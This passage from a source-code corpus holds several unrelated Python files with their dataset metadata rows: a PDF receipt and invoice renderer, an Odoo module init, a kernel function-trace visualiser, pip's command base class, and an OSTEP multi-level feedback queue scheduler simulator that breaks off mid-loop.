"PDF_RECEIPT_COBRAND_LOGO_PATH", settings.PDF_RECEIPT_COBRAND_LOGO_PATH
)
self.tax_label = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID_LABEL", settings.PDF_RECEIPT_TAX_ID_LABEL)
self.tax_id = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID", settings.PDF_RECEIPT_TAX_ID)
self.footer_text = configuration_helpers.get_value("PDF_RECEIPT_FOOTER_TEXT", settings.PDF_RECEIPT_FOOTER_TEXT)
self.disclaimer_text = configuration_helpers.get_value(
"PDF_RECEIPT_DISCLAIMER_TEXT", settings.PDF_RECEIPT_DISCLAIMER_TEXT,
)
self.billing_address_text = configuration_helpers.get_value(
"PDF_RECEIPT_BILLING_ADDRESS", settings.PDF_RECEIPT_BILLING_ADDRESS
)
self.terms_conditions_text = configuration_helpers.get_value(
"PDF_RECEIPT_TERMS_AND_CONDITIONS", settings.PDF_RECEIPT_TERMS_AND_CONDITIONS
)
self.brand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_LOGO_HEIGHT_MM
) * mm
self.cobrand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
) * mm
# From Context
self.items_data = items_data
self.item_id = item_id
self.date = ModuleI18nService().strftime(date, 'SHORT_DATE')
self.is_invoice = is_invoice
self.total_cost = '{currency}{amount:.2f}'.format(currency=self.currency, amount=total_cost)
self.payment_received = '{currency}{amount:.2f}'.format(currency=self.currency, amount=payment_received)
self.balance = '{currency}{amount:.2f}'.format(currency=self.currency, amount=balance)
# initialize the pdf variables
self.margin = 15 * mm
self.page_width = letter[0]
self.page_height = letter[1]
self.min_clearance = 3 * mm
self.second_page_available_height = ''
self.second_page_start_y_pos = ''
self.first_page_available_height = ''
self.pdf = None
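        # Illustrative call (added comment with assumed values, not in the original file):
        #   PDFInvoice(items_data, item_id='B100023', date=datetime.now(), is_invoice=False,
        #              total_cost=40.0, payment_received=40.0, balance=0.0).generate_pdf(buf)
        # where each items_data entry carries the keys documented in the docstring above.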
def is_on_first_page(self):
"""
Returns True if it's the first page of the pdf, False otherwise.
"""
return self.pdf.current_page_count() == 1
def generate_pdf(self, file_buffer):
"""
Takes in a buffer and puts the generated pdf into that buffer.
"""
self.pdf = NumberedCanvas(file_buffer, pagesize=letter)
self.draw_border()
y_pos = self.draw_logos()
self.second_page_available_height = y_pos - self.margin - self.min_clearance
self.second_page_start_y_pos = y_pos
y_pos = self.draw_title(y_pos)
self.first_page_available_height = y_pos - self.margin - self.min_clearance
y_pos = self.draw_course_info(y_pos)
y_pos = self.draw_totals(y_pos)
self.draw_footer(y_pos)
self.pdf.insert_page_break()
self.pdf.save()
def draw_border(self):
"""
Draws a big border around the page leaving a margin of 15 mm on each side.
"""
self.pdf.setStrokeColorRGB(0.5, 0.5, 0.5)
self.pdf.setLineWidth(0.353 * mm)
self.pdf.rect(self.margin, self.margin,
self.page_width - (self.margin * 2), self.page_height - (self.margin * 2),
stroke=True, fill=False)
@staticmethod
def load_image(img_path):
"""
Loads an image given a path. An absolute path is assumed.
If the path points to an image file, it loads and returns the Image object, None otherwise.
"""
try:
img = Image.open(img_path)
except IOError, ex:
log.exception('Pdf unable to open the image file: %s', str(ex))
img = None
return img
def draw_logos(self):
"""
Draws logos.
"""
horizontal_padding_from_border = self.margin + 9 * mm
vertical_padding_from_border = 11 * mm
img_y_pos = self.page_height - (
self.margin + vertical_padding_from_border + max(self.cobrand_logo_height, self.brand_logo_height)
)
# Left-Aligned cobrand logo
if self.cobrand_logo_path:
cobrand_img = self.load_image(self.cobrand_logo_path)
if cobrand_img:
img_width = float(cobrand_img.size[0]) / (float(cobrand_img.size[1]) / self.cobrand_logo_height)
self.pdf.drawImage(cobrand_img.filename, horizontal_padding_from_border, img_y_pos, img_width,
self.cobrand_logo_height, mask='auto')
# Right aligned brand logo
if self.logo_path:
logo_img = self.load_image(self.logo_path)
if logo_img:
img_width = float(logo_img.size[0]) / (float(logo_img.size[1]) / self.brand_logo_height)
self.pdf.drawImage(
logo_img.filename,
self.page_width - (horizontal_padding_from_border + img_width),
img_y_pos,
img_width,
self.brand_logo_height,
mask='auto'
)
return img_y_pos - self.min_clearance
def draw_title(self, y_pos):
"""
Draws the title, order/receipt ID and the date.
"""
if self.is_invoice:
title = (_('Invoice'))
id_label = (_('Invoice'))
else:
title = (_('Receipt'))
id_label = (_('Order'))
# Draw Title "RECEIPT" OR "INVOICE"
vertical_padding = 5 * mm
horizontal_padding_from_border = self.margin + 9 * mm
font_size = 21
self.pdf.setFontSize(font_size)
self.pdf.drawString(horizontal_padding_from_border, y_pos - vertical_padding - font_size / 2, title)
y_pos = y_pos - vertical_padding - font_size / 2 - self.min_clearance
horizontal_padding_from_border = self.margin + 11 * mm
font_size = 12
self.pdf.setFontSize(font_size)
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Order/Invoice No.
self.pdf.drawString(horizontal_padding_from_border, y_pos,
_(u'{id_label} # {item_id}').format(id_label=id_label, item_id=self.item_id))
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Date
self.pdf.drawString(
horizontal_padding_from_border, y_pos, _(u'Date: {date}').format(date=self.date)
)
return y_pos - self.min_clearance
def draw_course_info(self, y_pos):
"""
Draws the main table containing the data items.
"""
course_items_data = [
['', (_('Description')), (_('Quantity')), (_('List Price\nper item')), (_('Discount\nper item')),
(_('Amount')), '']
]
for row_item in self.items_data:
course_items_data.append([
'',
Paragraph(row_item['item_description'], getSampleStyleSheet()['Normal']),
row_item['quantity'],
'{currency}{list_price:.2f}'.format(list_price=row_item['list_price'], currency=self.currency),
'{currency}{discount:.2f}'.format(discount=row_item['discount'], currency=self.currency),
'{currency}{item_total:.2f}'.format(item_total=row_item['item_total'], currency=self.currency),
''
])
padding_width = 7 * mm
desc_col_width = 60 * mm
qty_col_width = 26 * mm
list_price_col_width = 21 * mm
discount_col_width = 21 * mm
amount_col_width = 40 * mm
course_items_table = Table(
course_items_data,
[
padding_width,
desc_col_width,
qty_col_width,
list_price_col_width,
discount_col_width,
amount_col_width,
padding_width
],
splitByRow=1,
repeatRows=1
)
course_items_table.setStyle(TableStyle([
#List Price, Discount, Amount data items
('ALIGN', (3, 1), (5, -1), 'RIGHT'),
# Amount header
('ALIGN', (5, 0), (5, 0), 'RIGHT'),
# Amount column (header + data items)
('RIGHTPADDING', (5, 0), (5, -1), 7 * mm),
# Quantity, List Price, Discount header
('ALIGN', (2, 0), (4, 0), 'CENTER'),
# Description header
('ALIGN', (1, 0), (1, -1), 'LEFT'),
# Quantity data items
('ALIGN', (2, 1), (2, -1), 'CENTER'),
# Lines below the header and at the end of the table.
('LINEBELOW', (0, 0), (-1, 0), 1.00, '#cccccc'),
('LINEBELOW', (0, -1), (-1, -1), 1.00, '#cccccc'),
# Innergrid around the data rows.
('INNERGRID', (1, 1), (-2, -1), 0.50, '#cccccc'),
# Entire table
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TOPPADDING', (0, 0), (-1, -1), 2 * mm),
('BOTTOMPADDING', (0, 0), (-1, -1), 2 * mm),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
]))
rendered_width, rendered_height = course_items_table.wrap(0, 0)
table_left_padding = (self.page_width - rendered_width) / 2
split_tables = course_items_table.split(0, self.first_page_available_height)
if len(split_tables) > 1:
# The entire Table won't fit in the available space and requires splitting.
# Draw the part that can fit, start a new page
# and repeat the process with the rest of the table.
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
while len(split_tables) > 1:
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
else:
# Table will fit without the need for splitting.
course_items_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
if not self.is_on_first_page():
y_pos = self.second_page_start_y_pos
return y_pos - rendered_height - self.min_clearance
def prepare_new_page(self):
"""
Inserts a new page and includes the border and the logos.
"""
self.pdf.insert_page_break()
self.draw_border()
y_pos = self.draw_logos()
return y_pos
def draw_totals(self, y_pos):
"""
Draws the boxes containing the totals and the tax id.
"""
totals_data = [
[(_('Total')), self.total_cost],
[(_('Payment Received')), self.payment_received],
[(_('Balance')), self.balance]
]
if self.is_invoice:
# only print TaxID if we are generating an Invoice
totals_data.append(
['', '{tax_label}: {tax_id}'.format(tax_label=self.tax_label, tax_id=self.tax_id)]
)
heights = 8 * mm
totals_table = Table(totals_data, 40 * mm, heights)
styles = [
# Styling for the totals table.
('ALIGN', (0, 0), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
# Styling for the Amounts cells
# NOTE: since we are not printing the TaxID for Credit Card
# based receipts, we need to change the cell range for
# these formatting rules
('RIGHTPADDING', (-1, 0), (-1, 2), 7 * mm),
('GRID', (-1, 0), (-1, 2), 3.0, colors.white),
('BACKGROUND', (-1, 0), (-1, 2), '#EEEEEE'),
]
totals_table.setStyle(TableStyle(styles))
__, rendered_height = totals_table.wrap(0, 0)
left_padding = 97 * mm
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
# if space left on page is smaller than the rendered height, render the table on the next page.
self.prepare_new_page()
totals_table.drawOn(self.pdf, self.margin + left_padding, self.second_page_start_y_pos - rendered_height)
return self.second_page_start_y_pos - rendered_height - self.min_clearance
else:
totals_table.drawOn(self.pdf, self.margin + left_padding, y_pos - rendered_height)
return y_pos - rendered_height - self.min_clearance
def draw_footer(self, y_pos):
"""
Draws the footer.
"""
para_style = getSampleStyleSheet()['Normal']
para_style.fontSize = 8
footer_para = Paragraph(self.footer_text.replace("\n", "<br/>"), para_style)
disclaimer_para = Paragraph(self.disclaimer_text.replace("\n", "<br/>"), para_style)
billing_address_para = Paragraph(self.billing_address_text.replace("\n", "<br/>"), para_style)
footer_data = [
['', footer_para],
[(_('Billing Address')), ''],
['', billing_address_para],
[(_('Disclaimer')), ''],
['', disclaimer_para]
]
footer_style = [
# Styling for the entire footer table.
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
('FONTSIZE', (0, 0), (-1, -1), 9),
('TEXTCOLOR', (0, 0), (-1, -1), '#AAAAAA'),
# Billing Address Header styling
('LEFTPADDING', (0, 1), (0, 1), 5 * mm),
# Disclaimer Header styling
('LEFTPADDING', (0, 3), (0, 3), 5 * mm),
('TOPPADDING', (0, 3), (0, 3), 2 * mm),
# Footer Body styling
# ('BACKGROUND', (1, 0), (1, 0), '#EEEEEE'),
# Billing Address Body styling
('BACKGROUND', (1, 2), (1, 2), '#EEEEEE'),
# Disclaimer Body styling
('BACKGROUND', (1, 4), (1, 4), '#EEEEEE'),
]
if self.is_invoice:
terms_conditions_para = Paragraph(self.terms_conditions_text.replace("\n", "<br/>"), para_style)
footer_data.append([(_('TERMS AND CONDITIONS')), ''])
footer_data.append(['', terms_conditions_para])
# TERMS AND CONDITIONS header styling
footer_style.append(('LEFTPADDING', (0, 5), (0, 5), 5 * mm))
footer_style.append(('TOPPADDING', (0, 5), (0, 5), 2 * mm))
# TERMS AND CONDITIONS body styling
footer_style.append(('BACKGROUND', (1, 6), (1, 6), '#EEEEEE'))
footer_table = Table(footer_data, [5 * mm, 176 * mm])
footer_table.setStyle(TableStyle(footer_style))
__, rendered_height = footer_table.wrap(0, 0)
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
self.prepare_new_page()
footer_table.drawOn(self.pdf, self.margin, self.margin + 5 * mm)
| agpl-3.0 | -7,822,837,237,229,962,000 | 37.522727 | 119 | 0.555162 | false |
PongPi/isl-odoo | addons/product_margin/wizard/__init__.py | 444 | 1078 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 7,053,722,849,262,236,000 | 42.12 | 79 | 0.61039 | false |
EPDCenter/android_kernel_rockchip_ylp | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more human
view of the call stack by drawing a textual but hierarchical tree of
calls. Only the functions' names and the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some time, but not too much; the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 | 593,490,336,828,014,000 | 26.596899 | 70 | 0.673034 | false |
LChristakis/chalice-hunter | lib/python3.4/site-packages/pip/basecommand.py | 79 | 9310 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import traceback
import optparse
import warnings
from pip._vendor.six import StringIO
from pip import cmdoptions
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import appdirs, get_prog, normalize_path
from pip.utils.deprecation import RemovedInPip8Warning
from pip.utils.filesystem import check_path_owner
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
name = None
usage = None
hidden = False
log_stream = "ext://sys.stdout"
def __init__(self, isolated=False):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
'isolated': isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(
cmdoptions.general_group,
self.parser,
)
self.parser.add_option_group(gen_opts)
def _build_session(self, options, retries=None, timeout=None):
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = (
timeout if timeout is not None else options.timeout
)
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
if options.quiet:
level = "WARNING"
elif options.verbose:
level = "DEBUG"
else:
level = "INFO"
# Compute the path for our debug log.
debug_log_path = os.path.join(appdirs.user_log_dir("pip"), "debug.log")
# Ensure that the path for our debug log is owned by the current user
# and if it is not, disable the debug log.
write_debug_log = check_path_owner(debug_log_path)
logging_dictConfig({
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"indent": {
"()": IndentingFormatter,
"format": (
"%(message)s"
if not options.log_explicit_levels
else "[%(levelname)s] %(message)s"
),
},
},
"handlers": {
"console": {
"level": level,
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_stream,
"formatter": "indent",
},
"debug_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": debug_log_path,
"maxBytes": 10 * 1000 * 1000, # 10 MB
"backupCount": 1,
"delay": True,
"formatter": "indent",
},
"user_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": options.log or "/dev/null",
"delay": True,
"formatter": "indent",
},
},
"root": {
"level": level,
"handlers": list(filter(None, [
"console",
"debug_log" if write_debug_log else None,
"user_log" if options.log else None,
])),
},
# Disable any logging besides WARNING unless we have DEBUG level
# logging enabled. These use both pip._vendor and the bare names
# for the case where someone unbundles our libraries.
"loggers": dict(
(
name,
{
"level": (
"WARNING"
if level in ["INFO", "ERROR"]
else "DEBUG"
),
},
)
for name in ["pip._vendor", "distlib", "requests", "urllib3"]
),
})
# We add this warning here instead of up above, because the logger
# hasn't been configured until just now.
if not write_debug_log:
logger.warning(
"The directory '%s' or its parent directory is not owned by "
"the current user and the debug log has been disabled. Please "
"check the permissions and owner of that directory. If "
"executing pip with sudo, you may want the -H flag.",
os.path.dirname(debug_log_path),
)
if options.log_explicit_levels:
warnings.warn(
"--log-explicit-levels has been deprecated and will be removed"
" in a future version.",
RemovedInPip8Warning,
)
# TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical(
'Could not find an activated virtualenv (required).'
)
sys.exit(VIRTUALENV_NOT_FOUND)
# Check if we're using the latest version of pip available
if (not options.disable_pip_version_check
and not getattr(options, "no_index", False)):
with self._build_session(
options,
retries=0,
timeout=min(5, options.timeout)) as session:
pip_version_check(session)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug('Exception information:\n%s', format_exc())
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except CommandError as exc:
logger.critical('ERROR: %s', exc)
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except KeyboardInterrupt:
logger.critical('Operation cancelled by user')
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except:
logger.critical('Exception:\n%s', format_exc())
return UNKNOWN_ERROR
return SUCCESS
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
| mit | 446,102,189,319,639,400 | 33.481481 | 79 | 0.537594 | false |
jackyyf/ucore_os_lab | related_info/ostep/ostep9-mlfq.py | 54 | 12243 | #! /usr/bin/env python
import sys
from optparse import OptionParser
import random
# finds the highest nonempty queue
# -1 if they are all empty
def FindQueue():
q = hiQueue
while q > 0:
if len(queue[q]) > 0:
return q
q -= 1
if len(queue[0]) > 0:
return 0
return -1
def LowerQueue(currJob, currQueue, issuedIO):
if currQueue > 0:
# in this case, have to change the priority of the job
job[currJob]['currPri'] = currQueue - 1
if issuedIO == False:
queue[currQueue-1].append(currJob)
job[currJob]['ticksLeft'] = quantum[currQueue-1]
else:
if issuedIO == False:
queue[currQueue].append(currJob)
job[currJob]['ticksLeft'] = quantum[currQueue]
def Abort(str):
sys.stderr.write(str + '\n')
exit(1)
#
# PARSE ARGUMENTS
#
parser = OptionParser()
parser.add_option('-s', '--seed', default=0, help='the random seed',
action='store', type='int', dest='seed')
parser.add_option('-n', '--numQueues', help='number of queues in MLFQ (if not using -Q)', default=3,
action='store', type='int', dest='numQueues')
parser.add_option('-q', '--quantum', help='length of time slice (if not using -Q)', default=10,
action='store', type='int', dest='quantum')
parser.add_option('-Q', '--quantumList', help='length of time slice per queue level, specified as x,y,z,... where x is the quantum length for the highest priority queue, y the next highest, and so forth',
default='', action='store', type='string', dest='quantumList')
parser.add_option('-j', '--numJobs', default=3, help='number of jobs in the system',
action='store', type='int', dest='numJobs')
parser.add_option('-m', '--maxlen', default=100, help='max run-time of a job (if randomly generating)',
action='store', type='int', dest='maxlen')
parser.add_option('-M', '--maxio', default=10, help='max I/O frequency of a job (if randomly generating)',
action='store', type='int', dest='maxio')
parser.add_option('-B', '--boost', default=0, help='how often to boost the priority of all jobs back to high priority',
action='store', type='int', dest='boost')
parser.add_option('-i', '--iotime', default=5, help='how long an I/O should last (fixed constant)',
action='store', type='int', dest='ioTime')
parser.add_option('-S', '--stay', default=False, help='reset and stay at same priority level when issuing I/O',
action='store_true', dest='stay')
parser.add_option('-I', '--iobump', default=False, help='if specified, jobs that finished I/O move immediately to front of current queue',
action='store_true', dest='iobump')
parser.add_option('-l', '--jlist', default='', help='a comma-separated list of jobs to run, in the form x1,y1,z1:x2,y2,z2:... where x is start time, y is run time, and z is how often the job issues an I/O request',
action='store', type='string', dest='jlist')
parser.add_option('-c', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
random.seed(options.seed)
# MLFQ: How Many Queues
numQueues = options.numQueues
quantum = {}
if options.quantumList != '':
# instead, extract number of queues and their time slic
quantumLengths = options.quantumList.split(',')
numQueues = len(quantumLengths)
qc = numQueues - 1
for i in range(numQueues):
quantum[qc] = int(quantumLengths[i])
qc -= 1
else:
for i in range(numQueues):
quantum[i] = int(options.quantum)
hiQueue = numQueues - 1
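# Illustrative note (added sketch, not part of the original script): with
# -Q 30,20,10 the loop above assigns the first value to the highest queue,
# i.e. quantum = {2: 30, 1: 20, 0: 10} and hiQueue = 2; with plain -n 3 -q 10
# every queue gets a 10-tick slice.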
# MLFQ: I/O Model
# the time for each IO: not great to have a single fixed time but...
ioTime = int(options.ioTime)
# This tracks when IOs and other interrupts are complete
ioDone = {}
# This stores all info about the jobs
job = {}
# seed the random generator
random.seed(options.seed)
# jlist 'startTime,runTime,ioFreq:startTime,runTime,ioFreq:...'
jobCnt = 0
if options.jlist != '':
allJobs = options.jlist.split(':')
for j in allJobs:
jobInfo = j.split(',')
if len(jobInfo) != 3:
sys.stderr.write('Badly formatted job string. Should be x1,y1,z1:x2,y2,z2:...\n')
sys.stderr.write('where x is the startTime, y is the runTime, and z is the I/O frequency.\n')
exit(1)
assert(len(jobInfo) == 3)
startTime = int(jobInfo[0])
runTime = int(jobInfo[1])
ioFreq = int(jobInfo[2])
job[jobCnt] = {'currPri':hiQueue, 'ticksLeft':quantum[hiQueue], 'startTime':startTime,
'runTime':runTime, 'timeLeft':runTime, 'ioFreq':ioFreq, 'doingIO':False,
'firstRun':-1}
if startTime not in ioDone:
ioDone[startTime] = []
ioDone[startTime].append((jobCnt, 'JOB BEGINS'))
jobCnt += 1
else:
# do something random
for j in range(options.numJobs):
startTime = 0
runTime = int(random.random() * options.maxlen)
ioFreq = int(random.random() * options.maxio)
job[jobCnt] = {'currPri':hiQueue, 'ticksLeft':quantum[hiQueue], 'startTime':startTime,
'runTime':runTime, 'timeLeft':runTime, 'ioFreq':ioFreq, 'doingIO':False,
'firstRun':-1}
if startTime not in ioDone:
ioDone[startTime] = []
ioDone[startTime].append((jobCnt, 'JOB BEGINS'))
jobCnt += 1
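# Illustrative note (added sketch, not part of the original script): a spec of
# -l 0,50,10 produces job[0] = {'currPri': hiQueue, 'ticksLeft': quantum[hiQueue],
# 'startTime': 0, 'runTime': 50, 'timeLeft': 50, 'ioFreq': 10, 'doingIO': False,
# 'firstRun': -1} and queues a 'JOB BEGINS' event in ioDone[0] so the job
# enters the system at time 0.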
numJobs = len(job)
print 'Here is the list of inputs:'
print 'OPTIONS jobs', numJobs
print 'OPTIONS queues', numQueues
for i in range(len(quantum)-1,-1,-1):
print 'OPTIONS quantum length for queue %2d is %3d' % (i, quantum[i])
print 'OPTIONS boost', options.boost
print 'OPTIONS ioTime', options.ioTime
print 'OPTIONS stayAfterIO', options.stay
print 'OPTIONS iobump', options.iobump
print '\n'
print 'For each job, three defining characteristics are given:'
print ' startTime : at what time does the job enter the system'
print ' runTime : the total CPU time needed by the job to finish'
print ' ioFreq : every ioFreq time units, the job issues an I/O'
print ' (the I/O takes ioTime units to complete)\n'
print 'Job List:'
for i in range(numJobs):
print ' Job %2d: startTime %3d - runTime %3d - ioFreq %3d' % (i, job[i]['startTime'],
job[i]['runTime'], job[i]['ioFreq'])
print ''
if options.solve == False:
print 'Compute the execution trace for the given workloads.'
print 'If you would like, also compute the response and turnaround'
print 'times for each of the jobs.'
print ''
print 'Use the -c flag to get the exact results when you are finished.\n'
exit(0)
# initialize the MLFQ queues
queue = {}
for q in range(numQueues):
queue[q] = []
# TIME IS CENTRAL
currTime = 0
# use these to know when we're finished
totalJobs = len(job)
finishedJobs = 0
print '\nExecution Trace:\n'
while finishedJobs < totalJobs:
# find highest priority job
# run it until either
# (a) the job uses up its time quantum
# (b) the job performs an I/O
# check for priority boost
if options.boost > 0 and currTime != 0:
if currTime % options.boost == 0:
print '[ time %d ] BOOST ( every %d )' % (currTime, options.boost)
# remove all jobs from queues (except high queue)
for q in range(numQueues-1):
for j in queue[q]:
if job[j]['doingIO'] == False:
queue[hiQueue].append(j)
queue[q] = []
# print 'BOOST: QUEUES look like:', queue
# change priority to high priority
# reset number of ticks left for all jobs (XXX just for lower jobs?)
# add to highest run queue (if not doing I/O)
for j in range(numJobs):
# print '-> Boost %d (timeLeft %d)' % (j, job[j]['timeLeft'])
if job[j]['timeLeft'] > 0:
# print '-> FinalBoost %d (timeLeft %d)' % (j, job[j]['timeLeft'])
job[j]['currPri'] = hiQueue
job[j]['ticksLeft'] = quantum[hiQueue]
# print 'BOOST END: QUEUES look like:', queue
# check for any I/Os done
if currTime in ioDone:
for (j, type) in ioDone[currTime]:
q = job[j]['currPri']
job[j]['doingIO'] = False
print '[ time %d ] %s by JOB %d' % (currTime, type, j)
if options.iobump == False:
queue[q].append(j)
else:
queue[q].insert(0, j)
# now find the highest priority job
currQueue = FindQueue()
if currQueue == -1:
print '[ time %d ] IDLE' % (currTime)
currTime += 1
continue
#print 'FOUND QUEUE: %d' % currQueue
#print 'ALL QUEUES:', queue
# there was at least one runnable job, and hence ...
currJob = queue[currQueue][0]
if job[currJob]['currPri'] != currQueue:
Abort('currPri[%d] does not match currQueue[%d]' % (job[currJob]['currPri'], currQueue))
job[currJob]['timeLeft'] -= 1
job[currJob]['ticksLeft'] -= 1
if job[currJob]['firstRun'] == -1:
job[currJob]['firstRun'] = currTime
runTime = job[currJob]['runTime']
ioFreq = job[currJob]['ioFreq']
ticksLeft = job[currJob]['ticksLeft']
timeLeft = job[currJob]['timeLeft']
